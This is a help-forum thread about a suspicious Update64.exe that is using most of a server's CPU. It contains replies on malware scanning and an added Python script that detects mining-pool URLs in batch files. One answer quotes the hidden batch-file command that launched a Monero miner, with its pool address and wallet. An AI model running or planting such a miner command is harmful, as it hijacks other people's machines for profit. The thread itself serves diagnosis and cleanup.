-1

I have tried finding out what Update64.exe really does. I think it might be a virus but there's not much out there on the topic. Does anyone know how to fix this? It's using pretty much 80-100% of CPU.

I have tried running the Microsoft Malicious Software Removal Tool. It didn't find anything. Might try Security Essentials next. But, I figured I would ask here just in case any of you guys ran into this issue before. Your positive input is highly appreciated.

DomainsFeatured
  • The Microsoft Malicious Software Removal Tool isn't a full featured, comprehensive anti-malware tool. It only looks for a specific and limited number of malicious programs. You need to scan this machine with a proper anti-malware tool. – joeqwerty Apr 27 '17 at 22:29
  • Upload the suspicious file to https://www.virustotal.com/ and scan it with multiple virus scanners at once. – Gerald Schneider Apr 28 '17 at 13:05
  • This sounds like ransomware in the process of encrypting your data. If it's not too late, pull power now and put the disk in a different computer to save what data you can. Under no circumstances should you pay the ransom. That helps fund further attacks, and makes you complicit in them. – Joel Coel Apr 28 '17 at 13:55

2 Answers

0

We had a similar issue two days ago. We had a c:\windows\dell folder that contained the update64.exe. In that folder were also a couple of batch files, one of which had this line:

Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u 45EngfR9yFHGSGLXMSVh88XuErCN95qQYirYNm4pVaJDakxthy3KWPP2hgDBVaAwcBafup6sefXML3CTYXmZfSJLUfHQQXW -p x -dbg -1

A few Google searches led us to this site as the source: httpX://monero.crypto-pool.fr/

This was a production server, so we tried for a bit, but ended up restoring from backup.

I say Reinstate Monica
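A triage sketch for the kind of batch file described in the answer above, added here as an example and not part of the original post: it scans batch-file text for stratum pool URLs and pulls out the executable, pool host, port and wallet argument so they can be blocked at the firewall or searched for on other hosts. The sample text is constructed from the quoted line with a placeholder wallet, and the function names are hypothetical.

```python
import re
import shlex

# Constructed sample modelled on the line quoted in the answer.
# The wallet value is a placeholder, not a real address.
SAMPLE_BATCH = r"""@echo off
rem constructed sample, not recovered from a real host
cd /d c:\windows\dell
Update64 -o stratum+tcp://xmr.crypto-pool.fr:3333 -u WALLET_PLACEHOLDER -p x -dbg -1
echo done
"""

# Mining pools are addressed with stratum+tcp:// (or stratum+ssl://) URLs.
STRATUM_RE = re.compile(r'stratum\+(?:tcp|ssl)://([^\s:/"]+)(?::(\d+))?', re.I)

def parse_miner_line(line):
    """Describe a miner invocation, or return None if the line has no stratum URL."""
    m = STRATUM_RE.search(line)
    if not m:
        return None
    try:
        # posix=False keeps backslashes in Windows paths intact
        tokens = shlex.split(line, posix=False)
    except ValueError:
        tokens = line.split()  # unbalanced quotes: fall back to whitespace split
    opts = {}
    for i, tok in enumerate(tokens[:-1]):
        if tok in ("-o", "-u", "-p"):
            opts[tok] = tokens[i + 1].strip('"')
    return {
        "executable": tokens[0].strip('"'),
        "pool_host": m.group(1).lower(),
        "pool_port": int(m.group(2)) if m.group(2) else None,
        "wallet": opts.get("-u"),
    }

def scan_batch_text(text):
    """Return one finding per non-comment line that launches a miner."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.lower().startswith(("rem ", "::")):
            continue  # skip batch comments
        finding = parse_miner_line(stripped)
        if finding:
            hits.append(dict(finding, line=lineno))
    return hits

if __name__ == "__main__":
    for hit in scan_batch_text(SAMPLE_BATCH):
        print(hit)
```

The same regular expression can be run over process command lines or scheduled-task actions exported from the host, since the pool URL has to appear wherever the miner is launched.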
-1

I used Malwarebytes to scan and remove update64.exe. Also deleted the c:\windows\dell folder, which had other viruses in it.